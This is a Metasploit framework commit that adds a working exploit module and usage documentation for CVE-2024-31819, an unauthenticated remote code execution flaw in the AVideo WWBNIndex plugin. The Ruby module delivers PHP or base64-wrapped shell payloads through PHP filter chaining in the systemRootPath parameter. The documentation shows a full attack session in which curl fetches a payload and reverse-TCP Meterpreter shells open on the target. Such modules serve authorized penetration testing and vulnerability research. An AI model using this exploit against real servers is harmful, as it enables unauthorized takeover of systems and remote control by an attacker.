Land rapid7#19071, Add AVideo RCE module

jheysel-r7 · jheysel-r7 · commit 10acd863908a · 2024-05-21T14:27:15.000-04:00
Add module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE
diff --git a/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md b/documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in the AVideo platform,
+specifically within the WWBNIndex plugin.
+The vulnerability exists due to improper input validation in the `submitIndex.php` file, where the `systemRootPath` parameter
+is directly passed to a `require()` PHP function without proper sanitization.
+Attackers can exploit this by leveraging the PHP filter chaining technique
+to execute arbitrary PHP code on the server.
+The vulnerability is present in versions from 12.4 up to 14.2.
+
+To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>.
+Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed.
+This can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
+
+## Verification Steps
+
+1. Start `msfconsole` in your Metasploit framework.
+2. Use the module: `use exploit/multi/http/avideo_wwbnindex_unauth_rce`.
+3. Set `RHOSTS` to the target's address where the AVideo platform is installed.
+4. Set `TARGETURI` to the base path of the AVideo installation if it is not at the root directory (default is `/`).
+5. Optionally, configure other options such as `SSL` and `RPORT` if the target environment requires it.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload, granting access according to the payload's capabilities.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against AVideo Platform with WWBNIndex plugin version 12.9
+
+**Setup**:
+
+- Target: AVideo platform with WWBNIndex plugin version 12.9 installed in a Docker container.
+- Attacker: Metasploit Framework.
+
+**Example**:
+
+```
+msf6 > search avideo
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/avideo_wwbnindex_unauth_rce  2024-04-04       excellent  Yes    AVideo WWBNIndex Plugin Unauthenticated RCE
+   1    \_ target: Automatic                          .                .          .      .
+   2    \_ target: PHP In-Memory                      .                .          .      .
+   3    \_ target: Unix In-Memory                     .                .          .      .
+   4    \_ target: Windows In-Memory                  .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/avideo_wwbnindex_unauth_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
+
+msf6 > use 3
+[*] Additionally setting TARGET => Unix In-Memory
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > options
+
+Module options (exploit/multi/http/avideo_wwbnindex_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      nhjkrZakk        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set rhosts 192.168.100.20
+rhosts => 192.168.100.20
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lhost eth0
+lhost => 192.168.100.10
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lport 1337
+lport => 1337
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set fetch_srvport 5000
+fetch_srvport => 5000
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (3045380 bytes) to 192.168.100.20
+[*] Meterpreter session 1 opened (192.168.100.10:1337 -> 192.168.100.20:52936) at 2024-04-04 23:08:05 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.100.20
+OS           : Ubuntu 20.04 (Linux 5.4.0-169-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.100.20 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > use 2
+[*] Additionally setting TARGET => PHP In-Memory
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (39927 bytes) to 192.168.100.20
+[*] Meterpreter session 2 opened (192.168.100.10:1337 -> 192.168.100.20:36258) at 2024-04-04 23:08:44 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
diff --git a/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb b/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::PhpFilterChain
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
+          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`
+          function without proper sanitization. By exploiting this, an attacker can leverage the
+          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
+          for the execution of commands and control over the affected system. The exploit is
+          particularly dangerous because it does not require authentication, making it possible
+          for any remote attacker to exploit this vulnerability.
+        },
+        'Author' => [
+          'Valentin Lobstein'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-31819'],
+          ['URL', 'https://github.com/WWBN/AVideo'],
+          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
+        ],
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2024-04-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        }
+      )
+    )
+  end
+
+  def exploit
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    filter_payload = generate_php_filter_payload(php_code)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => "systemRootPath=#{filter_payload}"
+    )
+    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'follow_redirect' => true
+    })
+    return CheckCode::Unknown('Failed to connect to the target.') unless res
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
+    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]
+
+    version = Rex::Version.new(version_match[1])
+    plugin_check = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
+      'method' => 'GET'
+    })
+    unless plugin_check&.code == 200
+      CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')
+    end
+
+    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
+      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
+    end
+
+    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
+  end
+end
